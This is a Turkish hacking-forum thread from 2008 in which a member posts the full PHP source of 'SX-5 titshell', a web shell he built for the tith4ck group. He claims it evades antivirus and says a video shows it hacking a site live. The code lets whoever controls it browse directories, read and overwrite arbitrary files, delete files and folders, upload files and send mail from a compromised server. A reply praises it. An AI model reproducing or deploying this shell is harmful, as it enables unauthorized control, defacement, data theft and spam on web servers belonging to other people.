Kullanıcı adınız: Misafir Üye Ol! |Portal | Forum | Arama | Üye Listesi | Üye Girişi

SX-5 titshell php version 1.0.0 Options · View
BL4CkkinG
#0 Tarih 16.08.2008 17:41:21
Yeni Üye



Kayıt Tarihi: 19.08.2007
Mesaj Sayısı: 409

Slm arkadaşlar tith4ck için ne yapsam ne yapsam diyordum, ve shell yapmaya karar verdim , daha önce titshell yapılmıştı ama aspx versionuydu bende php version ' nunu yapmak istedim 3-4 gün önce başlamıştım ve sonunda bitirdim biraz cebelleştirdi ama değdi bence.
titshell 'in birçok özeliği var . Video yu izledikten sonra farkına varacaksınız. Video da canlı canlı titshell ile site hackledik. İyi kullanmalar

screen:


video:
http://www.tith4ck.net/video/titshell.rar

Code:

<?php
//-------------------------------------------------------------------------------------------------
// ********************************************************************************************
// * *
// * ____ *
// * \ / | *
// * S \/ --- |____ tith4ck PhP SHell ! 1.0.0 *
// * /\ | *
// * / \ _____| *
// * *
// ********************************************************************************************
// uyarılar:
// *Shell'den mail yollayabilmek için shell'in bulunduğu sunucunun smpt ayarlarının yapılmış olması
// gerekmektedir.
// *shell sadece php destekli host'larda çalışır.
// *Shell hiç bir antivirüs programına yakalanmaz.
// *upload işlemlerinde upload edilen dosya BL4CkkinG.php olarak kayıt olur.
// *Shell'den dolayı gelecek zararlardan yapımcı sorumlu değildir.
// *Sorunlarınız için BL4CkkinG@gmail.com mail adresine mail atarak yardım alabilirsiniz.
//
// ****Bu shell sadece tith4ck için yazılmıştır****
//
//
// .$yapımcı : "BL4CkkinG "; -------> Emeğe saygı gösterin ve en azından bu bölümü değiştirmeyin.
// .THANKS : " andruilXP - C-M-D ";
// $tarih=("16.08.2008");
// $version=("1.0.0");
// $site=("www.tith4ck.net");
//
//ust kısım**
print"<html><body bgcolor='CC6600' link='FFFF99' alink='white' vlink='FFFF99'>";
print"<div align='center'>";
print"<font face='webdings' size='6' color='#0000000'>!</font><font size='5' color='black'>SX-5 TitShell!</font><br>";
print"<font face='webdings' size='6' color='white'>6</font></div>";

// önemli dizinler için , code's**
$cekaq=@$HTTP_POST_VARS['bg'];
$cekaqs=@$HTTP_POST_VARS['bg'];

//server Bilgileri**
print"<table border='1' bgcolor='FFFF99' bordercolor='gray' cellpadding='0' cellspacing='0'>";
print"<td width='1000' height='25'><div align='center'>[Server-Bilgileri]</div></td></table>";
print"<hr color='#000000'></hr>";

print"<font size='3' color='#000000'><b>Shell dizini:</b></font>";
print"<font color='FFFF99'>&nbsp;"; echo __FILE__; echo"<br></font>";

print"<font size='3' color='#000000'><b>Kurulu programlar:</b></font>";
print"<font color='FFFF99'>&nbsp;"; print @$SERVER_SOFTWARE; echo "<br></font>";

print"<font size='3' color='#000000'><b>Server İsmi:</b></font>";
print"<font color='FFFF99'>&nbsp;"; print @$SERVER_NAME; echo"</font><br>";

print"<font size='3' color='#000000'><b>Server Protokolü:</b></font>";
print"<font color='FFFF99'>&nbsp;"; print @$SERVER_PROTOCOL; echo"</font><br>";

print"<font size='3' color='#000000'><b>Bulunduğun Dizin:</b></font>";
print"<font color='FFFF99'>&nbsp;"; print"$cekaq";

print"<hr color='#000000'></hr>";
print"<font size='3' color='#000000'><b>Server Güvenliği:</b></font>";
$red="<font color='FFFF99'>";
$green="<font color='FFFF99'>";
//safe mode**
if(@ini_get(safe_mode)) {
print"$green Açık";
}
else
{
print"$red [Kapalı]";
}
print"</font>";
print"<hr color='#000000'></hr>";
print"<div align='center'><font face='webdings' size='6' color='white'>6</font></div>";

//black gezgini :)**
print"<table border='1' bgcolor='FFFF99' bordercolor='gray' cellpadding='0' cellspacing='0'>";
print"<td width='1000' height='25'><div align='center'>[Gez-Düzenle]</div></td></table>";
print"<form action='#' method='post'>";
print"<font color='#000000' size='2'>";

print"Dizin Git:</font><input type='text' name='bg' size='55' value='$cekaq' style='color:red;font-size:9 pt;'>";
print"&nbsp;<input type='submit' value='GiT' style='background:7e2817;color:white;font-size:9 pt;'>";
print"</form>";

//Düzenle form**
print"<form action='#' method='post'>";
print"<font color='#000000' size='2'>";
print"Düzenle:</font><input type='text' name='edit' size='55' value='$cekaqs' style='color:red;font-size:9 pt;'>";
print"&nbsp;<input type='submit' value='DüzenLe' style='background:7e2817;color:white;font-size:9 pt;'>";
print"</form>";

$files="$cekaq";
$acsunu=@opendir($files);
while($sonuc=@readdir($acsunu)) {
if(@is_dir($sonuc))
print("<font color='#000000'>[Dizin]</font>");
if(@is_file($sonuc))
print("<font color='#000000'>[Dosya]</font>");
print"<a href='$sonuc' target=blank>$sonuc</a><br>";
}
@closedir($acsunu);

print"<hr color='#000000'></hr>";


//düzenle işlem**
print"<div align='center'><font face='webdings' size='6' color='white'>6</font></div>";
print"<table border='1' bgcolor='FFFF99' bordercolor='gray' cellpadding='0' cellspacing='0'>";
print"<td width='1000' height='25'><div align='center'>[Genel-Özelikler]</div></td></table>";

$facfile=@$HTTP_POST_VARS['edit'];
$openget=@file_get_contents($facfile);

print"<br><table border='0' bordercolor='gray' cellpadding='0' cellspacing='0'><td width='300' height='50'>";
print"<form action='#' method='post' <font color='#000000'>Dosya:</font>";
print"<input type='text' name='dosya' size='30' style='color:red;font-size:9 pt;' value='index.php'><br>";
print"<textarea rows='6' cols='40' name='editfile' style='color:red;font-size:9 pt;'>$openget</textarea><br>";
print"<input type='reset' value='TemizLe' style='background:7e2817;color:white;font-size:9 pt;'>";
print"<input type='submit' value='KaydeT' style='background:7e2817;color:white;font-size:9 pt;'>";
print"<br><br><font color='#000000'>Dosya:</font>";

$dosya=@$HTTP_POST_VARS['dosya'];
$editfile=@$HTTP_POST_VARS['editfile'];

$fopen=@fopen("$dosya",'w');
$ffwrite="$editfile";
@fwrite($fopen,$ffwrite);
@fclose($fopen);
if($fopen) {
print"<font color='FFFF99'>Kaydedildi</font>";
}
else
{
print"<font color='FFFF99'>Kaydedilemedi</font>";
}
print"</form></td>";

//CHMOD sorgulama**
print"<td width='500' height='50'>";
print"<form action='#' method='post'>";
print"<div align='center'><font color='#000000'>Dosya:</font>";
print"<input type='text' name='chmod' size='45' style='color:red;font-size:9 pt;' value='index.php'>";
print"<input type='submit' value='SoR' style='background:7e2817;color:white;font-size:9 pt;'>";

$chmod=@$HTTP_POST_VARS['chmod'];
//yazma
print"<br><font color='#000000'>Yazma:</font>";
if(@is_writeable($chmod)) {
print"<font color='FFFF99'>Açık</font><br>";
}
else
{
print"<font color='FFFF99'>Kapalı</font><br>";
}
//okuma**
print"<font color='#000000'>Okuma:</font>";
if(@is_readable($chmod)) {
print"<font color='FFFF99'>Açık</font><br>";
}
else
{
print"<font color='FFFF99'>Kapalı</font><br>";
}
//çalıştırma**
print"<font color='#000000'>Çalıştırma:</font>";
if(@is_executable($chmod)) {
print"<font color='FFFF99'>Açık</font><br>";
}
else
{
print"<font color='FFFF99'>Kapalı</font><br>";
}
print"</form></td></div></table>";
print"<hr color='#000000'></hr>";

//Dosya Silme**
print"<table border='0' bordercolor='orange' bgcolor='' cellpadding='0' cellspacing='0'>";
print"<td width='400' height='60'>";
print"<form action='#' method='post'><font color='#000000'>Dosya Sil:</font>";
print"<input type='text' name='ddosya' style='color:red;font-size:9 pt;' size='45'>";
print"<input type='submit' value='SiL' style='background:7e2817;color:white;font-size:9 pt;'>";
print"</form>";
$doss="<font color='#000000'>Dosya:</font>";
$ddosya=@$_POST['ddosya'];
if(@unlink($ddosya)) {
print"$doss"."<font color='FFFF99'>Silindi</font>";
}
else
{
print"$doss"."<font color='FFFF99'>Silinemedi</font>";
}
print"</td>";

//dizin oluşturma ve silme**
print"<td width='550' height='60'>";
print"<form action='#' method='post'><font color='#000000'>Dizin işlemleri:</font>";
print"<input type='text' name='dirdizin' style='color:red;font-size:9 pt;' size='45' value='../newfolder'>";
print"<input type='submit' value='İşlem' style='background:7e2817;color:white;font-size:9 pt;'>";
print"<font color='#000000'>&nbsp;Oluştur:</font><input type='radio' name='dirmake' value='ds'>";
print"<font color='#000000'>SiL:</font><input type='radio' name='dirmake' value='d'>";

$dirdizin=@$_POST['dirdizin'];
$dirmake=@$_POST['dirmake'];

$dizinrenk="<font color='#000000'><br>Dizin:</font>";

//Dizin Oluştur**
if($dirmake=="ds") {
$mkdir=@mkdir($dirdizin);
}
if(@$mkdir) {
print"$dizinrenk"."<font color='FFFF99'>Dizin Oluşturuldu</font>";
}
else
{
print"$dizinrenk"."<font color='FFFF99'>Dizin Oluşturulamadı</font>";
}


//Dizin Sil**
if($dirmake=="d") {
$rmdir=@rmdir($dirdizin);
}
if(@$rmdir) {
print"$dizinrenk"."<font color='FFFF99'>Dizin Silindi</font>";
}
else
{
print"$dizinrenk"."<font color='FFFF99'>Dizin Silinemedi</font>";
}
print"</form></td></table>";

print"<hr color='#000000'></hr>";

//Mail Yolla**
print"<table border='0' bordercolor='orange' bgcolor='' cellpadding='0' cellspacing='0'>";
print"</td><td width='300' height='10'>";
print"<form action='#' method='post'>";
print"<font color='#000000'>Kime:</font>";
print"&nbsp;<input type='text' name='kime' style='color:red;font-size:9 pt;' value=' @gmail.com' size='25'><br>";
print"<font color='#000000'>Konu:</font>";
print"&nbsp;<input type='text' name='konu' style='color:red;font-size:9 pt;' size='25'><br>";
print"<textarea rows='5' cols='40' name='mmail' style='color:red;font-size:9 pt;'></textarea><br>";
print"<input type='reset' value='Temizle' style='background:7e2817;color:white;font-size:9 pt;'>";
print"<input type='submit' value='Gönder' style='background:7e2817;color:white;font-size:9 pt;'></form>";
$mailkime=@$HTTP_POST_VARS['kime'];
$mailkonu=@$HTTP_POST_VARS['konu'];
$mailmail=@$HTTP_POST_VARS['mmail'];
$kimdenmail="from:titphpshell@gmail.com";
if(@mail($mailkime,$mailkonu,$mailmail,$kimdenmail)) {
echo"<font color='FFFF99'>Mail gönderildi</font>";
}
else
{
echo"<font color='FFFF99'>Mail Gönderilemedi</font>";
}
print"</td>";

//Dosya Yükle**
print"<td width='300' height='120'><div align='right'>";
print"<form ENCTYPE='multipart/form-data' action='#' method='post'><input type='hidden' name='size' value='100000'>";
print"Dosya:<input name='userfile' type='file' style='color:red;font-size:9 pt;' size='30'>";
print"<br><input type='submit' value='Yükle' style='background:7e2817;color:white;font-size:9 pt;'></form>";

if(@move_uploaded_file($userfile, "BL4CkkinG.php")) {
print"<font color='FFFF99'>Dosya Yüklendi</font>";
}
else
{
print"<font color='FFFF99'>Dosya Yüklenemedi</font></div>";
}

print"</td></table>";

//En son yapimcı bölümü**
print"<hr color='#000000'></hr>";
print"<font color='#000000'>";
print"<div align='center'>copyright by BL4CkkinG ----- www.tith4ck.Net</div>";
print"</font>";

?>








Seyyar_Mafya <<---------------- O şimdi Vatani görevini yapıyor.
BL4CkkinG
#1 Tarih 25.08.2008 13:47:57
Yeni Üye



Kayıt Tarihi: 19.08.2007
Mesaj Sayısı: 409
Kalgançı Çak
#2 Tarih 25.08.2008 14:13:39
Yeni Üye



Kayıt Tarihi: 25.08.2008
Mesaj Sayısı: 3
Eline sağlık güzele benziyor ama turuncu pek açmamış yav (:d)


Örnek olarak server vermen güzel olmuş (a)

İnceliyorum : )
Bu konuyu okuyan kullanıcılar
1 Ziyaretçi ve